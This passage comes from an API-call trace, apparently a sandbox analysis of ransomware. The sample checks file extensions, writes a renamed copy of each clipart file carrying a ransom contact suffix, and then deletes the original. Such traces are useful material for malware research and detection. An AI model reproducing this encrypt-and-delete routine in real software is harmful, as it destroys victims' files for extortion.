Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString=".dbf") returned 4 [0272.938] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString=".1cd") returned 4 [0272.938] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString=".jpg") returned 4 [0272.938] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString=".doc") returned 4 [0272.938] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString=".docx") returned 5 [0272.939] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.939] lstrlenW (lpString=".pdf") returned 4 [0272.939] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString=".xls") returned 4 [0272.939] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.939] lstrlenW (lpString=".xlsx") returned 5 [0272.939] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.939] lstrlenW (lpString=".ppt") returned 4 [0272.939] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.939] lstrlenW (lpString=".zip") returned 4 [0272.939] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.939] lstrlenW (lpString=".rar") returned 4 [0272.939] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString=".bz2") returned 4 [0272.939] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString=".7z") returned 3 [0272.939] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.939] lstrlenW (lpString=".dbf") returned 4 [0272.939] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.939] lstrlenW (lpString=".1cd") returned 4 [0272.939] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.939] lstrlenW (lpString=".jpg") returned 4 [0272.939] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.939] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.939] lstrlenW (lpString="HH00685_.WMF") returned 12 [0272.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.940] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4032) returned 1 [0272.940] CloseHandle (hObject=0x3ac) returned 1 [0272.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf")) returned 0x20 [0272.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.940] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.940] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.941] GetLastError () returned 0x0 [0272.941] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xfc0, lpOverlapped=0x0) returned 1 [0272.967] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xfd0, lpOverlapped=0x0) returned 1 [0272.968] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.968] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.968] SetEndOfFile (hFile=0x390) returned 1 [0272.968] CloseHandle (hObject=0x390) returned 1 [0272.968] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.968] SetEndOfFile (hFile=0x3ac) returned 1 [0272.970] CloseHandle (hObject=0x3ac) returned 1 [0272.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf")) returned 1 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.971] lstrlenW (lpString=".doc") returned 4 [0272.971] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString=".docx") returned 5 [0272.971] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.971] lstrlenW (lpString=".pdf") returned 4 [0272.971] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString=".xls") returned 4 [0272.971] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.971] lstrlenW (lpString=".xlsx") returned 5 [0272.971] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.971] lstrlenW (lpString=".ppt") returned 4 [0272.971] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.971] lstrlenW (lpString=".zip") returned 4 [0272.971] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.971] lstrlenW (lpString=".rar") returned 4 [0272.971] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString=".bz2") returned 4 [0272.971] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString=".7z") returned 3 [0272.971] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.971] lstrlenW (lpString=".dbf") returned 4 [0272.971] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.971] lstrlenW (lpString=".1cd") returned 4 [0272.971] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString=".jpg") returned 4 [0272.972] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString=".doc") returned 4 [0272.972] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString=".docx") returned 5 [0272.972] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.972] lstrlenW (lpString=".pdf") returned 4 [0272.972] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString=".xls") returned 4 [0272.972] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.972] lstrlenW (lpString=".xlsx") returned 5 [0272.972] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.972] lstrlenW (lpString=".ppt") returned 4 [0272.972] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString=".zip") returned 4 [0272.972] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.972] lstrlenW (lpString=".rar") returned 4 [0272.972] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString=".bz2") returned 4 [0272.972] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString=".7z") returned 3 [0272.972] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString=".dbf") returned 4 [0272.972] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.972] lstrlenW (lpString=".1cd") returned 4 [0272.972] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63 [0272.973] lstrlenW (lpString=".jpg") returned 4 [0272.973] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.973] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.973] lstrlenW (lpString="HH01013_.WMF") returned 12 [0272.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.987] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2848) returned 1 [0272.987] CloseHandle (hObject=0x2ac) returned 1 [0272.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf")) returned 0x20 [0272.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.988] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.988] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.988] GetLastError () returned 0x0 [0272.988] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xb20, lpOverlapped=0x0) returned 1 [0272.989] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xb30, lpOverlapped=0x0) returned 1 [0272.990] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.990] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.990] SetEndOfFile (hFile=0x398) returned 1 [0272.990] CloseHandle (hObject=0x398) returned 1 [0272.990] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.990] SetEndOfFile (hFile=0x2ac) returned 1 [0272.992] CloseHandle (hObject=0x2ac) returned 1 [0272.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.992] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf")) returned 1 [0272.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.992] lstrlenW (lpString=".doc") returned 4 [0272.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.992] lstrlenW (lpString=".docx") returned 5 [0272.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.992] lstrlenW (lpString=".pdf") returned 4 [0272.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.992] lstrlenW (lpString=".xls") returned 4 [0272.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.993] lstrlenW (lpString=".xlsx") returned 5 [0272.993] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.993] lstrlenW (lpString=".ppt") returned 4 [0272.993] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString=".zip") returned 4 [0272.993] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.993] lstrlenW (lpString=".rar") returned 4 [0272.993] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString=".bz2") returned 4 [0272.993] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString=".7z") returned 3 [0272.993] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString=".dbf") returned 4 [0272.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString=".1cd") returned 4 [0272.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString=".jpg") returned 4 [0272.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.993] lstrlenW (lpString=".doc") returned 4 [0272.993] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString=".docx") returned 5 [0272.993] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.993] lstrlenW (lpString=".pdf") returned 4 [0272.993] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.993] lstrlenW (lpString=".xls") returned 4 [0272.994] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.994] lstrlenW (lpString=".xlsx") returned 5 [0272.994] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.994] lstrlenW (lpString=".ppt") returned 4 [0272.994] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.994] lstrlenW (lpString=".zip") returned 4 [0272.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.994] lstrlenW (lpString=".rar") returned 4 [0272.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.994] lstrlenW (lpString=".bz2") returned 4 [0272.994] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.994] lstrlenW (lpString=".7z") returned 3 [0272.994] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.994] lstrlenW (lpString=".dbf") returned 4 [0272.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.994] lstrlenW (lpString=".1cd") returned 4 [0272.994] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63 [0272.994] lstrlenW (lpString=".jpg") returned 4 [0272.994] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.994] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.995] lstrlenW (lpString="HH01058_.WMF") returned 12 [0272.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.995] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2756) returned 1 [0272.995] CloseHandle (hObject=0x2ac) returned 1 [0272.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf")) returned 0x20 [0272.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.996] GetLastError () returned 0x0 [0272.996] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xac4, lpOverlapped=0x0) returned 1 [0272.997] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xad0, lpOverlapped=0x0) returned 1 [0272.998] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.998] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.998] SetEndOfFile (hFile=0x398) returned 1 [0272.998] CloseHandle (hObject=0x398) returned 1 [0272.998] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.998] SetEndOfFile (hFile=0x2ac) returned 1 [0272.999] CloseHandle (hObject=0x2ac) returned 1 [0273.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf")) returned 1 [0273.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.000] lstrlenW (lpString=".doc") returned 4 [0273.000] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.000] lstrlenW (lpString=".docx") returned 5 [0273.000] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.000] lstrlenW (lpString=".pdf") returned 4 [0273.000] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.000] lstrlenW (lpString=".xls") returned 4 [0273.000] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.000] lstrlenW (lpString=".xlsx") returned 5 [0273.000] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.000] lstrlenW (lpString=".ppt") returned 4 [0273.000] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.000] lstrlenW (lpString=".zip") returned 4 [0273.000] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.000] lstrlenW (lpString=".rar") returned 4 [0273.000] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString=".bz2") returned 4 [0273.001] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString=".7z") returned 3 [0273.001] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString=".dbf") returned 4 [0273.001] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString=".1cd") returned 4 [0273.001] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString=".jpg") returned 4 [0273.001] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft 